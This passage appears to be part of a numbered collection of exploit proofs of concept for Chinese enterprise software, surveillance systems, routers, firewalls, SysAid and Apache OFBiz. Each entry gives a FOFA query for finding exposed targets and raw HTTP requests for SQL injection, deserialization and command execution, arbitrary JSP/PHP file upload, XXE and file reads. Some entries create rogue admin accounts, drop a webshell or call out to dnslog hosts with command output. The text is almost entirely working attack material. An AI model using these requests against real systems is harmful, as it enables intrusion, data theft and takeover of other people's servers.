"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
}
}
}
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
}
}
}
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


/jfhatuwe.php

88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close


/astdfkhl.php

89. 致远互联FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
